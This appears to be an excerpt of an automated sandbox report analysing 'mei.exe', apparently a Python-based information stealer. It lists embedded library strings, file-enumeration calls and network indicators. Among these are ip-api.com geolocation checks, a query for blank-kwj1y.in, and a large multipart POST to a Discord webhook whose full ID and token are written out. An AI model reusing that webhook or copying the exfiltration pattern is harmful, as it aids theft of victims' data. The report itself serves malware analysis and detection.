ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: mei.exe, 00000001.00000002.2038251187.00007FFDFB132000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: mei.exe, 00000001.00000002.2039190548.00007FFDFB63B000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: mei.exe, 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mei.exe, 00000001.00000002.2041525721.00007FFE1025C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: mei.exe, 00000001.00000002.2042441121.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: mei.exe, 00000001.00000002.2041096731.00007FFE0EB41000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E7CFC _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6313E7CFC
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E7CFC _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6313E7CFC
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F1D94 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6313F1D94
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313D8880 FindFirstFileExW,FindClose,0_2_00007FF6313D8880
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,89_2_00007FF7D79E46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A288E0 FindFirstFileExA,89_2_00007FF7D7A288E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,89_2_00007FF7D79DE21C

              Networking

              barindex
              Potential dropper URLs found in powershell memory
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryx
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: unknownDNS traffic detected: queries for: blank-kwj1y.in
              Source: unknownHTTP traffic detected: POST /api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 696433User-Agent: python-urllib3/2.1.0Content-Type: multipart/form-data; boundary=e3d1360ad0622e034bb000d4c8b44246
              Source: mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E91404C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1752594754.000002E914108000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E913FBD000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033077416.000002E913FBD000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027009645.000002E914108000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1752721224.000001BAD6540000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1895388428.000001E1C95F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
